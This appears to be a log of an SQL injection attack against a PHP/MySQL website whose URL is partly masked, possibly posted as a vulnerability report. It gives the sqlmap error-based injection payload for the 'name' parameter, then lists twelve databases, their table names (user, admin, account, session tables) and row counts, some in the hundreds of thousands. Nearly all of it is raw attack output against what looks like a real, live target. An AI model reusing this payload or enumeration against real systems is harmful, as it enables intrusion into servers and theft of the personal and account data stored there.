Injection URL:
http://**.**.**.**/**.**.**.**mon.php?action=modelquote&cid=1&name=spacecomments
Parameter: name
sqlmap identified the following injection point(s) with a total of 1806 HTTP(s) requests:
---
Parameter: name (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: action=modelquote&cid=1&name=spacecomments WHERE 2810=2810 AND (SELECT 4947 FROM(SELECT COUNT(*),CONCAT(0x717a787171,(SELECT (ELT(4947=4947,1))),0x716b706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- dmRq
---
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
available databases [12]:
[*] caiep
[*] cdcol
[*] ciep_mysqldb
[*] citic
[*] citicbak01
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] safea
[*] test
[*] yjh
Database: cdcol
[1 table]
+----------------------------------------------------+
| cds |
+----------------------------------------------------+
Database: phpmyadmin
[12 tables]
+----------------------------------------------------+
| pma__bookmark |
| pma__column_info |
| pma__designer_coords |
| pma__history |
| pma__pdf_pages |
| pma__recent |
| pma__relation |
| pma__table_coords |
| pma__table_info |
| pma__table_uiprefs |
| pma__tracking |
| pma__userconfig |
+----------------------------------------------------+
Database: performance_schema
[52 tables]
Database: mysql
[29 tables]
Database: safea
[46 tables]
+----------------------------------------------------+
| 2010_ciep_collect_info |
| 2010_survey1_info |
| 2010_survey2_info |
| 2010_survey3_info |
| 2011_ciep_collect_info |
| address_info |
| addresslist_info |
| assign_info |
| base_info |
| caiep2safea |
| catalog_info |
| coluass_info |
| column_info |
| cont_info |
| count_info |
| depart_info |
| exp_info |
| group_info |
| label_info |
| link_info |
| note_info |
| org_info |
| para_info |
| poll_info |
| q_expert_gd |
| q_expert_sftg |
| q_fgs_hwrc_en |
| q_fgs_hwrc_zh |
| q_fgs_xzgwry |
| q_fgs_yrdw |
| q_safea_gd |
| q_safea_sftg |
| q_unit_gd |
| q_unit_sftg |
| return_info |
| session_info |
| survey1_info |
| survey2_info |
| survey3_info |
| task_info |
| temp_info |
| tpl_info |
| user_info |
| vars_info |
| zfxxgk_info |
| zfxxgk_note |
+----------------------------------------------------+
Database: caiep
[62 tables]
+----------------------------------------------------+
| achi_info |
| admin_info |
| assi_info |
| assign_info |
| base_info |
| cata_info |
| catagraph_info |
| catalog_info |
| cgzj_info |
| col_info |
| coluass_info |
| column_info |
| cont_info |
| cont_info_temp |
| content_info |
| contkey_info |
| contlabel_info |
| depinfo_info |
| dlg_info |
| dlg_info_new |
| dlglog_info |
| dlgmem_info |
| dlgmgr_info |
| dlgtec_info |
| domain_info |
| exp_info |
| focus_info |
| hpconfig_info |
| imglink_info |
| industry_info |
| label_info |
| link_info |
| mail_info |
| member_info |
| mob_info |
| mobclass_info |
| moblist_info |
| msglog_info |
| news_info |
| note_info |
| para1_info |
| para_info |
| poll_info |
| pollip_info |
| pro_info |
| proj_info |
| projmem_info |
| reader_info |
| renwu_info |
| research_info |
| return_info |
| russian_info |
| stat_info |
| task_info |
| temp1_info |
| temp_info |
| train_info |
| trainpro_info |
| unit_info |
| user_info |
| vars_info |
| visitlog |
+----------------------------------------------------+
Database: ciep_mysqldb
[24 tables]
+----------------------------------------------------+
| acct_info |
| admin_info |
| assign_info |
| catalog_info |
| ciep_info |
| feedback_info |
| filelog_info |
| inqu_info |
| key_info |
| menu_info |
| msglog_info |
| news_info |
| order_info |
| org_info |
| para_info |
| proj_info |
| role_info |
| roleassign_info |
| show_info |
| showuser_info |
| sympos_info |
| token_info |
| topics_info |
| user_info |
+----------------------------------------------------+
Database: yjh
[85 tables]
+----------------------------------------------------+
| [Table]adminsession |
| [Table]ads |
| [Table]announcements |
| [Table]attachments |
| [Table]attachmenttypes |
| [Table]blocks |
| [Table]cache_0 |
| [Table]cache_1 |
| [Table]cache_4 |
| [Table]cache_8 |
| [Table]cache_d |
| [Table]cache |
| [Table]categories |
| [Table]channels |
| [Table]click |
| [Table]clickgroup |
| [Table]clickuser |
| [Table]creditlog |
| [Table]creditrule |
| [Table]crons |
| [Table]customfields |
| [Table]forums |
| [Table]friendlinks |
| [Table]members |
| [Table]modelcolumns |
| [Table]modelfolders |
| [Table]modelinterval |
| [Table]models |
| [Table]pages |
| [Table]polls |
| [Table]postitems |
| [Table]postlog |
| [Table]postmessages |
| [Table]postset |
| [Table]prefields |
| [Table]reports |
| [Table]robotitems |
| [Table]robotlog |
| [Table]robotmessages |
| [Table]robots |
| [Table]rss |
| [Table]settings |
| [Table]sitemaplogs |
| [Table]spacecomments |
| [Table]spaceitems |
| [Table]spacenews |
| [Table]spacepages |
| [Table]spacetags |
| [Table]styles |
| [Table]tagcache |
| [Table]tags |
| [Table]usergroups |
| [Table]userlog |
| [Table]words |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pm_indexes |
| uc_pm_lists |
| uc_pm_members |
| uc_pm_messages_0 |
| uc_pm_messages_1 |
| uc_pm_messages_2 |
| uc_pm_messages_3 |
| uc_pm_messages_4 |
| uc_pm_messages_5 |
| uc_pm_messages_6 |
| uc_pm_messages_7 |
| uc_pm_messages_8 |
| uc_pm_messages_9 |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+----------------------------------------------------+
Database: citicbak01
[21 tables]
+----------------------------------------------------+
| adminsession_info |
| adodb_logsql |
| apply_info |
| assign_info |
| assigndoctype_info |
| assigndoctypeadmin_info |
| catalog_info |
| doc_info |
| job_info |
| lease_info |
| muser_info |
| news_info |
| note_info |
| para_info |
| photocomment_info |
| photograph_info |
| settings_info |
| task_info |
| user_info |
| vars_info |
| viewdoc_info |
+----------------------------------------------------+
Database: citic
[21 tables]
+----------------------------------------------------+
| adminsession_info |
| adodb_logsql |
| apply_info |
| assign_info |
| assigndoctype_info |
| assigndoctypeadmin_info |
| catalog_info |
| doc_info |
| job_info |
| lease_info |
| muser_info |
| news_info |
| note_info |
| para_info |
| photocomment_info |
| photograph_info |
| settings_info |
| task_info |
| user_info |
| vars_info |
| viewdoc_info |
+----------------------------------------------------+
Database: information_schema
[59 tables]
Database: cdcol
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| cds | 2 |
+----------------------------------------------------+---------+
Database: phpmyadmin
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| pma__column_info | 1 |
| pma__recent | 1 |
| pma__userconfig | 1 |
+----------------------------------------------------+---------+
Database: citic
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| apply_info | 589667 |
| viewdoc_info | 28740 |
| note_info | 6126 |
| assigndoctype_info | 1076 |
| doc_info | 1050 |
| user_info | 54 |
| para_info | 50 |
| vars_info | 23 |
| catalog_info | 20 |
| assigndoctypeadmin_info | 19 |
| task_info | 15 |
| assign_info | 14 |
| adminsession_info | 13 |
| muser_info | 12 |
| settings_info | 12 |
| photograph_info | 5 |
| adodb_logsql | 3 |
| job_info | 2 |
| news_info | 2 |
| lease_info | 1 |
| photocomment_info | 1 |
+----------------------------------------------------+---------+
Database: yjh
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| uc_feeds | 67 |
| uc_settings | 26 |
| uc_notelist | 4 |
| uc_applications | 1 |
| uc_failedlogins | 1 |
| uc_memberfields | 1 |
| uc_members | 1 |
| uc_protectedmembers | 1 |
+----------------------------------------------------+---------+
Database: safea
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| count_info | 5298670 |
| `2010_survey2_info` | 175062 |
| `2010_survey3_info` | 169063 |
| `2011_ciep_collect_info` | 122441 |
| `2010_survey1_info` | 95649 |
| q_fgs_yrdw | 30582 |
| address_info | 30162 |
| q_fgs_xzgwry | 21889 |
| q_fgs_hwrc_en | 14135 |
| q_fgs_hwrc_zh | 13957 |
| caiep2safea | 4788 |
| cont_info | 4480 |
| return_info | 4309 |
| note_info | 2971 |
| q_expert_gd | 1706 |
| q_unit_sftg | 1552 |
| q_expert_sftg | 1529 |
| q_unit_gd | 1350 |
| q_safea_sftg | 774 |
| label_info | 760 |
| vars_info | 756 |
| survey2_info | 485 |
| survey1_info | 384 |
| q_safea_gd | 288 |
| session_info | 239 |
| assign_info | 173 |
| catalog_info | 160 |
| column_info | 152 |
| para_info | 132 |
| coluass_info | 95 |
| survey3_info | 55 |
| task_info | 47 |
| user_info | 47 |
| poll_info | 37 |
| group_info | 35 |
| depart_info | 31 |
| base_info | 28 |
| link_info | 28 |
| zfxxgk_info | 26 |
| `2010_ciep_collect_info` | 18 |
| temp_info | 16 |
| zfxxgk_note | 10 |
| addresslist_info | 5 |
| tpl_info | 1 |
+----------------------------------------------------+---------+
Database: ciep_mysqldb
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| order_info | 6351 |
| user_info | 3755 |
| acct_info | 3715 |
| para_info | 885 |
| proj_info | 382 |
| showuser_info | 228 |
| inqu_info | 138 |
| news_info | 106 |
| topics_info | 64 |
| catalog_info | 56 |
| assign_info | 27 |
| menu_info | 27 |
| org_info | 18 |
| feedback_info | 7 |
| show_info | 6 |
| admin_info | 5 |
| filelog_info | 4 |
| ciep_info | 1 |
| sympos_info | 1 |
+----------------------------------------------------+---------+
Database: citicbak01
+----------------------------------------------------+---------+
| Table | Entries |
+----------------------------------------------------+---------+
| viewdoc_info | 28186 |
| note_info | 4964 |
| assigndoctype_info | 1022 |
| doc_info | 1016 |
| user_info | 54 |
| para_info | 49 |
| vars_info | 23 |
| catalog_info | 20 |
| task_info | 15 |
| assign_info | 14 |
| assigndoctypeadmin_info | 14 |
| adminsession_info | 13 |
| muser_info | 12 |
| settings_info | 12 |
| photograph_info | 5 |
| adodb_logsql | 3 |
| job_info | 2 |
| news_info | 2 |
| lease_info | 1 |
| photocomment_info | 1 |
+----------------------------------------------------+---------+
RT